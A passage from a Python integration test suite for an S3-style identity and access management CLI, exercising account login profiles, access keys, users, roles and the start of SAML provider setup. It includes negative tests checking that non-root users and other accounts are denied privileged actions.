result.command_response_should_have("Access key deleted.")
test_msg = 'Delete access key for TestUser'
result = AuthTest(test_msg).delete_access_key(**test_user_access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User changePasswordUserLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "changePasswordUserLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'Delete User TestUser'
user_args = {}
user_args['UserName'] = "TestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'create account login profile should succeed.'
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="s3test"
user_args['Password'] = "abcdiu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'create account login profile should fail for already created profile.'
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="s3test"
user_args['Password'] = "abcdiu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("The request was rejected because it attempted to create or update a resource that already exists")
test_msg = 'create account login profile should fail for exceeding max allowed password length.'
user_args = {}
maxPasswordLength = "abcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijk\
abcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrddd";
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="s3test"
user_args['Password'] = maxPasswordLength
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create Account login profile")
test_msg = 'create account login profile should fail for empty account name.'
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="\"\""
user_args['Password'] = "abcdriu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Account name is required")
test_msg = 'create account login profile should fail for missing account name.'
user_args = {}
account_name_flag = ""
password_flag = "--password"
user_args['AccountName'] =""
user_args['Password'] = "abcdriu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Account name is required")
test_msg = 'create account login profile should fail for password missing.'
user_args = {}
account_name_flag = "-n"
password_flag = ""
user_args['AccountName'] ="abcd"
user_args['Password'] = ""
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Account login password is required")
test_msg = "Create account s3test_loginprofile0"
account_args = {'AccountName': 's3test_loginprofile0', 'Email': 's3test_loginprofile0@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements1 = get_response_elements(result1.status.stdout)
test_msg = "Create User accountLoginProfileTestUser"
user_args = {'UserName': 'accountLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is accountLoginProfileTestUser)'
access_key_args = {}
access_key_args['UserName'] = 'accountLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'CreateAccountLoginProfile should fail when tried with IAM User accessKey-secretKey'
user_name_flag = "-n"
password_flag = "--password"
access_key_args['AccountName'] ="s3test_loginprofile0"
access_key_args['Password'] = "newPassword"
result = AuthTest(test_msg).create_account_login_profile(user_name_flag , password_flag,\
**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action.")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User accountLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "accountLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create account s3test_loginprofile1"
account_args = {'AccountName': 's3test_loginprofile1', 'Email': 's3test_loginprofile1@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements1 = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "s3test_loginprofile1"
access_key_args['AccessKeyId'] = account_response_elements1['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements1['SecretKey']
test_msg = "Create account s3test_loginprofile2"
account_args = {'AccountName': 's3test_loginprofile2', 'Email': 's3test_loginprofile2@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result2 = AuthTest(test_msg).create_account(**account_args).execute_test()
result2.command_should_match_pattern(account_response_pattern)
account_response_elements2 = get_response_elements(result2.status.stdout)
test_msg = "Attempt: create account-login-profile for account name - s3test_loginprofile1 and access key of account s3test_loginprofile2 - Should fail."
access_key_args2 = {}
access_key_args2['AccountName'] = "s3test_loginprofile1"
access_key_args2['AccessKeyId'] = account_response_elements2['AccessKeyId']
access_key_args2['SecretAccessKey'] = account_response_elements2['SecretKey']
access_key_args2['Password'] = "newPassword"
result = AuthTest(test_msg).create_account_login_profile(user_name_flag , password_flag,\
**access_key_args2).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
account_args = {}
test_msg = "Delete account s3test_loginprofile1"
account_args = {'AccountName': 's3test_loginprofile1', 'Email': 's3test_loginprofile1@seagate.com', 'force': True}
s3test_access_key = S3ClientConfig.access_key_id
s3test_secret_key = S3ClientConfig.secret_key
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
account_args = {}
test_msg = "Delete account s3test_loginprofile2"
account_args = {'AccountName': 's3test_loginprofile2', 'Email': 's3test_loginprofile2@seagate.com', 'force': True}
S3ClientConfig.access_key_id = access_key_args2['AccessKeyId']
S3ClientConfig.secret_key = access_key_args2['SecretAccessKey']
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = s3test_access_key
S3ClientConfig.secret_key = s3test_secret_key
test_msg = 'GetAccountLoginProfile Successful'
account_args = {}
account_name_flag = "-n"
account_args['AccountName'] ="s3test"
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = (true|false), AccountName = [\s\S]*"
result = AuthTest(test_msg).get_account_login_profile(account_name_flag , **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'UpdateAccountLoginProfile Successful'
account_args = {}
account_name_flag = "-n"
password_flag = "--password"
account_args['AccountName'] ="s3test"
account_args['Password'] ="s3test456"
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'UpdateAccountLoginProfile Successful with ldap credentials'
account_args = {}
account_name_flag = "-n"
password_flag = "--password"
account_args['AccountName'] ="s3test"
account_args['Password'] ="s3test4567"
account_args['AccessKeyId'] = S3ClientConfig.ldapuser
account_args['SecretAccessKey'] = S3ClientConfig.ldappasswd
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = "Create account s3test_loginprofile_update"
account_args = {'AccountName': 's3test_loginprofile_update', 'Email': 's3test_loginprofile_update@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements1 = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "s3test_loginprofile_update"
access_key_args['AccessKeyId'] = account_response_elements1['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements1['SecretKey']
access_key_args['Password'] = "abcdoy"
test_msg = "create account-login-profile for account name - s3test_loginprofile_update with PasswordResetRequired - false."
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
account_name_flag = "-n"
password_flag = "--password"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**access_key_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'UpdateAccountLoginProfile should succeed with PasswordResetRequired set to true'
account_name_flag = "-n"
password_flag = "--password"
access_key_args['PasswordResetRequired'] ="True"
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **access_key_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'GetAccountLoginProfile Successful'
account_name_flag = "-n"
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = true, AccountName = [\s\S]*"
result = AuthTest(test_msg).get_account_login_profile(account_name_flag , **access_key_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = "Create User updateAccountLoginProfileTestUser"
user_args = {'UserName': 'updateAccountLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is updateAccountLoginProfileTestUser)'
access_key_args = {}
access_key_args['UserName'] = 'updateAccountLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
access_key_args['AccountName'] = 's3test_loginprofile_update'
test_msg = 'UpdateAccountLoginProfile should fail for unauthorized user'
access_key_args['Password'] = "abcd"
account_name_flag = "-n"
password_flag = "--password"
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action.")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User updateAccountLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "updateAccountLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create User getaccountloginprofiletest"
user_args = {'UserName': 'getaccountloginprofiletest'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key'
account_args = {}
account_args['UserName'] = 'getaccountloginprofiletest'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**account_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
account_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
account_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'GetAccountLoginProfile should fail when tried with IAM User accessKey-secretKey'
account_name_flag = "-n"
account_args['AccountName'] ="s3test"
result = AuthTest(test_msg).get_account_login_profile(account_name_flag , **account_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action.")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**account_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User getaccountloginprofiletest'
user_args = {}
user_args['UserName'] = "getaccountloginprofiletest"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'List Users (path prefix = /test/)'
user_args = {'PathPrefix': '/test/'}
list_user_pattern = "UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result.command_should_match_pattern(list_user_pattern)
test_msg = "List Users - Take access key and secret key from config"
new_config_entries = {'SG_ACCESS_KEY' : S3ClientConfig.access_key_id, 'SG_SECRET_KEY': S3ClientConfig.secret_key}
update_config_yaml(new_config_entries)
list_user_pattern = "UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result.command_should_match_pattern(list_user_pattern)
restore_config_yaml()
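# update_config_yaml / restore_config_yaml are suite helpers defined elsewhere.
# A minimal sketch of the update half, assuming a PyYAML-readable config file
# (the path here is illustrative):
def _update_config_yaml_sketch(entries, path="config.yaml"):
    import yaml
    with open(path) as f:
        config = yaml.safe_load(f) or {}
    config.update(entries)
    with open(path, "w") as f:
        yaml.safe_dump(config, f)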
test_msg = "List users - Take access key and secret key from env"
_use_root_credentials()
# Declare SG_ACCESS_KEY and SG_SECRET_KEY environment variables
os.environ['SG_ACCESS_KEY'] = S3ClientConfig.access_key_id
os.environ['SG_SECRET_KEY'] = S3ClientConfig.secret_key
user_args = {'PathPrefix': '/test/'}
list_user_pattern = "UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result.command_should_match_pattern(list_user_pattern)
# Remove environment variables declared above
os.environ.pop('SG_ACCESS_KEY')
os.environ.pop('SG_SECRET_KEY')
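# Setting and popping os.environ by hand, as above, leaves variables behind if
# a check fails in between. A sketch of a scoped alternative (helper name is
# illustrative, not part of this suite):
import contextlib
@contextlib.contextmanager
def _scoped_env_sketch(**overrides):
    saved = {k: os.environ.get(k) for k in overrides}
    os.environ.update(overrides)
    try:
        yield
    finally:
        for key, old in saved.items():
            if old is None:
                os.environ.pop(key, None)
            else:
                os.environ[key] = old
# usage: with _scoped_env_sketch(SG_ACCESS_KEY=S3ClientConfig.access_key_id): ...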
#TODO - Fix this test. It is skipped for now because it waits for the password to be entered manually at a prompt.
'''
test_msg = "List users - Take access key and secret key from prompt"
user_args = {'PathPrefix': '/test/'}
list_user_pattern = "Enter Access Key: Enter Secret Key: UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
stdin_values = S3ClientConfig.access_key_id + '\n' + S3ClientConfig.secret_key
S3ClientConfig.access_key_id = None
S3ClientConfig.secret_key = None
result = AuthTest(test_msg).list_users(**user_args).execute_test(False, False, stdin_values)
result.command_should_match_pattern(list_user_pattern)
'''
_use_root_credentials()
test_msg = 'Reset s3user1 user attributes (path and name)'
user_args = {}
user_args['UserName'] = "s3user1New"
user_args['NewUserName'] = "s3user1"
user_args['NewPath'] = "/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
test_msg = 'Delete User s3user1'
user_args = {}
user_args['UserName'] = "s3user1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create User s3user2 (path = /test/)"
user_args['UserName'] = "s3user2"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user2_response_pattern)
test_msg = 'Delete User s3user2'
user_args['UserName'] = "s3user2"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'Update User root (new name = s3root) should fail'
user_args = {}
user_args['UserName'] = "root"
user_args['NewUserName'] = "s3root"
result = AuthTest(test_msg).update_user(**user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot change user name of root user")
test_msg = 'Update User root (new path - /test/success)'
user_args = {}
user_args['UserName'] = "root"
user_args['NewPath'] = "/test/success/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
test_msg = 'List Users (default path)'
user_args = {}
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result == ""
test_msg = 'Reset root user attributes (path and name)'
user_args = {}
user_args['UserName'] = "root"
user_args['NewPath'] = "/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
# Test access key APIs.
# Each user can have only 2 access keys, hence all access key APIs are tested in the same function.
def accesskey_tests():
access_key_args = {}
test_msg = 'Create access key (user name not provided)'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Create access key (user does not exist)'
access_key_args = {}
access_key_args['UserName'] = 'userDoesNotExist'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create access key.")
test_msg = 'Create access key (user name is root)'
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_msg = 'Create access key (Allow only 2 credentials per user.)'
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create access key.")
test_msg = 'Delete access key (user name and access key id combination is incorrect)'
access_key_args['UserName'] = 'root3'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to delete access key.")
test_msg = 'Update access key for root user should fail(Change status from Active to Inactive)'
access_key_args['Status'] = "Inactive"
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).update_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("Access key status for root user can not be changed")
test_msg = 'Delete access key'
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
# List the access keys to verify the status of the remaining key
test_msg = 'List access keys'
access_key_args['UserName'] = 'root'
accesskey_response_pattern = "UserName = root, AccessKeyId = [\w-]*, Status = Active$"
result = AuthTest(test_msg).list_access_keys(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
user_args = {}
user_args['UserName'] = "s3user1"
test_msg = "Create User s3user1 (default path)"
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is s3user1)'
access_key_args = {}
access_key_args['UserName'] = 's3user1'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_msg = 'Update access key (Change status from Active to Inactive)'
access_key_args['Status'] = "Inactive"
access_key_args['UserName'] = 's3user1'
result = AuthTest(test_msg).update_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key Updated.")
test_msg = 'List access keys (Check if status is inactive.)'
access_key_args['UserName'] = 's3user1'
result = AuthTest(test_msg).list_access_keys(**access_key_args).execute_test()
result.command_response_should_have("Inactive")
test_msg = 'Delete access key'
access_key_args['UserName'] = 's3user1'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3user1'
user_args = {}
user_args['UserName'] = "s3user1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
# Verify that non-root users cannot use their own access key and secret key
# to create or delete access keys for other users.
'''
Setup for tests:
'''
_use_root_credentials()
user_args = {}
test_msg = "Create User s3user_1 using root access key and secret key " \
+ "(path = /test/)"
user_args['UserName'] = "s3user_1"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user2_response_pattern)
test_msg = "Create access key using root access key and secret key " \
+ "(user name is s3user_1)"
access_key_args['UserName'] = 's3user_1'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
response_elements = get_response_elements(result.status.stdout)
# Saving access key and secret key for s3user_1 for later use.
access_key_id_of_s3user1 = response_elements['AccessKeyId']
secret_key_of_s3user1 = response_elements['SecretAccessKey']
# Overwriting values of access key and secret key given by
# _use_root_credentials() with s3user_1's access key and secret key.
S3ClientConfig.access_key_id = access_key_id_of_s3user1
S3ClientConfig.secret_key = secret_key_of_s3user1
'''
runTest:
'''
test_msg = "Create User s3user_2 using s3user_1's access key and secret key " \
+ "(path = /test/)"
user_args['UserName'] = "s3user_2"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Setup for tests:
'''
_use_root_credentials()
test_msg = "Create User s3user_2 using root's access key and secret key " \
+ "(path = /test/)"
user_args['UserName'] = "s3user_2"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user2_response_pattern)
'''
runTest:
'''
test_msg = "Create access key using s3user_1's access key and secret key " \
+ "(user name is s3user_2)"
S3ClientConfig.access_key_id = access_key_id_of_s3user1
S3ClientConfig.secret_key = secret_key_of_s3user1
access_key_args['UserName'] = 's3user_2'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Setup for tests:
'''
_use_root_credentials()
test_msg = "Create access key using root access key and secret key " \
+ "(user name is s3user_2)"
access_key_args['UserName'] = 's3user_2'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
response_elements = get_response_elements(result.status.stdout)
# Saving access key and secret key for s3user_2 for later use.
access_key_id_of_s3user2 = response_elements['AccessKeyId']
secret_key_of_s3user2 = response_elements['SecretAccessKey']
# Overwriting values of access key and secret key given by
# _use_root_credentials() with s3user_2's access key and secret key.
S3ClientConfig.access_key_id = access_key_id_of_s3user2
S3ClientConfig.secret_key = secret_key_of_s3user2
'''
runTest:
'''
test_msg = 'Delete access key of s3user_1 using s3user_2\'s access key' \
+ ' and secret key'
access_key_args['UserName'] = 's3user_1'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Setup for tests:
'''
_use_root_credentials()
test_msg = 'Delete access key of s3user_1 using root credentials'
access_key_args['UserName'] = 's3user_1'
access_key_args['AccessKeyId'] = access_key_id_of_s3user1
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
S3ClientConfig.access_key_id = access_key_id_of_s3user2
S3ClientConfig.secret_key = secret_key_of_s3user2
'''
runTest:
'''
test_msg = "Delete User s3user_1 using s3user_2's access key and secret key"
user_args['UserName'] = "s3user_1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Teardown:
'''
_use_root_credentials()
test_msg = 'Delete access key of s3user_2 using root access key and secret key'
access_key_args['UserName'] = 's3user_2'
access_key_args['AccessKeyId'] = access_key_id_of_s3user2
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3user_1 using root access key and secret key'
user_args = {}
user_args['UserName'] = "s3user_1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'Delete User s3user_2 using root access key and secret key'
user_args = {}
user_args['UserName'] = "s3user_2"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
'''
Setup for tests for the scenario where one account's access key
and secret key are used to create an access key for a user in another account:
'''
test_msg = "Create account s3test_1"
account_args = {'AccountName': 's3test_1', 'Email': 's3test_1@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
# Overwriting values of access key and secret key given by
# _use_root_credentials() with new account 's3test_1's access key and secret key.
S3ClientConfig.access_key_id = account_response_elements['AccessKeyId']
S3ClientConfig.secret_key = account_response_elements['SecretKey']
'''
runTest:
'''
test_msg = "Create access key using another account's access key and secret key " \
+ "(user name is s3user_2)"
access_key_args = {}
access_key_args['UserName'] = 's3user_2'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("The request was rejected because it " \
+ "referenced a user that does not exist.")
'''
Teardown:
'''
account_args = {}
test_msg = "Delete account s3test_1"
account_args = {'AccountName': 's3test_1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# restoring previous values for further tests
_use_root_credentials()
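# Role CRUD tests: create a role with the default and an explicit Path, list
# roles, and delete them. The policy document is read from resources/policy.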
def role_tests():
policy_doc = os.path.join(os.path.dirname(__file__), 'resources', 'policy')
policy_doc_full_path = os.path.abspath(policy_doc)
test_msg = 'Create role (Path not specified)'
role_args = {}
role_args['RoleName'] = 'S3Test'
role_args['AssumeRolePolicyDocument'] = policy_doc_full_path
role_response_pattern = "RoleId = [\w-]*, RoleName = S3Test, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_role(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'Delete role'
result = AuthTest(test_msg).delete_role(**role_args).execute_test()
result.command_response_should_have("Role deleted.")
test_msg = 'Create role (Path is /test/)'
role_args['Path'] = '/test/'
role_response_pattern = "RoleId = [\w-]*, RoleName = S3Test, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_role(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'List role (Path is not given)'
role_args = {}
role_response_pattern = "RoleId = [\w-]*, RoleName = S3Test, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).list_roles(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'List role (Path is /test)'
role_response_pattern = "RoleId = [\w-]*, RoleName = S3Test, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).list_roles(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'Delete role'
role_args['RoleName'] = 'S3Test'
result = AuthTest(test_msg).delete_role(**role_args).execute_test()
result.command_response_should_have("Role deleted.")
def saml_provider_tests():
metadata_doc = os.path.join(os.path.dirname(__file__), 'resources', 'saml_metadata')
metadata_doc_full_path = os.path.abspath(metadata_doc)
test_msg = 'Create SAML provider'
saml_provider_args = {}
saml_provider_args['Name'] = 'S3IDP'
saml_provider_args['SAMLMetadataDocument'] = metadata_doc_full_path
saml_provider_response_pattern = "SAMLProviderArn = [\S]*$"
